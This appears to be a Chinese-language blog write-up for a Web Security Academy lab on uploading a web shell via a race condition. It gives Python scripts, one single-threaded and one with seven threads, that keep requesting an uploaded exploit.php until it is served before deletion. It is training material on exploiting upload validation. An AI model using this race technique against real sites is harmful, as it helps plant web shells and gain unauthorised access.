人生边上
0%

借助race condition的Web shell上传

发表于 更新于

本文是针对Lab: Web shell upload via race condition编写Python脚本的文档。

如上所述,写这篇文章旨在为Python脚本提供说明文档。虽然相应Lab有题解,但题解使用Burp suite Turbo Intruder扩展。我在搜索教程后发现所有题解都使用solution建议的解法。我认为自行Python脚本可以更简便地解决,同时可以锻炼Python代码能力。因此希望在此提供一种不同的解法。

by the way ,事实上solution中提供的也是Python脚本

要实现的Python脚本仅仅是需要不断向host发送GETrequests ,然后筛选出状态码为200的response即可。

这里要使用Python Requests库:

1
python -m pip install requests

先传一个正常的看下目录:files/avatars/Lenna_(test_image).png

我完成的第一版代码结果并没有结果,我想可能是Python请求的没那么快(?

1
2
3
4
5
6
7
8
9
10
11
12
13
# import argparse
import requests

def request():
    dir = "/files/avatars/exploit.php"
    url = "https://xxxx.web-security-academy.net"
    while True:
        response = requests.get(url + dir)
        if response.status_code == requests.codes.ok:
            print(response.text)

if __name__ == "__main__":
    request()

我参考别的代码,想是不是可以开几个线程?
力大砖飞,开了七个线程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# import argparse
import requests
import threading


def request():
    dir = "/files/avatars/exploit.php"
    url = "https://xxxxx.web-security-academy.net"
    while True:
        response = requests.get(url + dir)
        if response.status_code == requests.codes.ok:
            print(response.text)


if __name__ == "__main__":
    thread1 = threading.Thread(target=request)
    thread1.start()
    thread2 = threading.Thread(target=request)
    thread2.start()
    thread3 = threading.Thread(target=request)
    thread3.start()
    thread4 = threading.Thread(target=request)
    thread4.start()
    thread5 = threading.Thread(target=request)
    thread5.start()
    thread6 = threading.Thread(target=request)
    thread6.start()
    thread7 = threading.Thread(target=request)
    thread7.start()